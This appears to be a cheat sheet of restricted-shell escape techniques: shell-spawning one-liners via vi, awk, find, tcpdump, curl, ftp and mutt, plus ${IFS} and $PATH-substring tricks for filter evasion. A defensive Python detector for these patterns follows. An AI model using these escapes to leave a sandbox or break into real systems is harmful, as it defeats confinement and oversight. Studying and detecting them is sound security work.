
Break Out Of Jail / Shell Escaping Techniques

  • Discover powerful shell escaping techniques to break out of restricted environments.
  • Learn how to execute commands inside vi/vim, leverage awk, find, tcpdump, curl, ftp, mutt, and clever bash commands to escape jails and gain control.

Executing Commands Inside vi/vim

vi
:set shell=/bin/sh
:shell

Command Execution

:! /bin/bash

awk

awk 'BEGIN {system("/bin/sh")}'

find

find / -name 0xffsec -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

tcpdump

tcpdump -n -G 1 -z /usr/bin/php -U -A udp port 8080

curl

curl -T@`/bin/sh` localhost

curl

> nc -lvvp 1337
curl -T"/bin/sh" http://127.0.0.1:1337

Escape to a real shell via ftp (bang-command)

> ftp !/bin/sh

Spawn a shell via mutt (shell escape)

> mutt sh

IFS-based command injection to run sh

ls${IFS};sh${IFS}

List root folder in bash (${u} is unset, so l${u}s runs ls; ${PATH:0:1} is the first character of $PATH, normally /)

l${u}s ${PATH:0:1}

List /usr folder in bash (${PATH:0:4} is /usr when $PATH begins with /usr/)

l${u}s ${PATH:0:4}

Print $PATH

echo ${PATH:0}

Print three characters of $PATH starting at offset 2

echo ${PATH:2:3}
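
Detecting these escapes

For defenders, the techniques above can be flagged in process-execution telemetry. The following is an added example, not part of the original page: it checks exec events for a shell spawned by one of the listed tools (the vi, ftp and mutt escapes are typed inside the program and never appear on a command line) and for the listed one-liner and expansion patterns. The event format, rule names and sample events are assumptions constructed for illustration.

```python
import re

# Tools from this page that can hand the user a shell, and common shell names.
ESCAPE_PARENTS = {"vi", "vim", "awk", "find", "tcpdump", "curl", "ftp", "mutt"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Command-line patterns for the one-liners and expansion tricks listed above.
CMDLINE_RULES = [
    ("awk-system-call", re.compile(r"\bawk\b.*\bsystem\s*\(")),
    ("find-exec-shell-or-awk", re.compile(r"\bfind\b.*\s-exec\s+\S*(?:sh|awk)\b")),
    ("tcpdump-z-handler", re.compile(r"\btcpdump\b.*\s-z\s+\S")),
    ("curl-upload-of-shell", re.compile(r"\bcurl\b.*-T\s*[\"'@`]*/bin/\w*sh\b")),
    ("ifs-as-separator", re.compile(r"\$\{IFS\}|\$IFS\b")),
    ("parameter-substring", re.compile(r"\$\{\w+:\d+(?::\d+)?\}")),
    ("variable-inside-word", re.compile(r"\b[a-z]+\$\{\w+\}[a-z]+\b")),
]

def classify(event):
    """Return sorted rule names matched by one exec event.
    event: {'parent': parent executable path, 'cmdline': child command line}."""
    hits = set()
    argv = event["cmdline"].split()
    child = argv[0].rsplit("/", 1)[-1] if argv else ""
    parent = event["parent"].rsplit("/", 1)[-1]
    if parent in ESCAPE_PARENTS and child in SHELLS:
        hits.add("shell-child-of-escape-capable-tool")
    for name, rx in CMDLINE_RULES:
        if rx.search(event["cmdline"]):
            hits.add(name)
    return sorted(hits)

# Constructed sample events (not real logs); rbash stands in for a restricted shell.
SAMPLE_EVENTS = [
    {"parent": "/usr/bin/vim", "cmdline": "/bin/sh"},
    {"parent": "/bin/rbash", "cmdline": "awk 'BEGIN {system(\"/bin/sh\")}'"},
    {"parent": "/bin/rbash", "cmdline": "tcpdump -n -G 1 -z /usr/bin/php -U -A udp port 8080"},
    {"parent": "/bin/rbash", "cmdline": "ls${IFS};sh${IFS}"},
    {"parent": "/bin/rbash", "cmdline": "l${u}s ${PATH:0:1}"},
    {"parent": "/bin/bash", "cmdline": "ls -la /tmp"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev) or ["no-match"], ev["parent"], "->", ev["cmdline"])
```

The parent/child rule is the more robust of the two, since command-line patterns can be reworded; tune both against normal activity on the host before alerting on them.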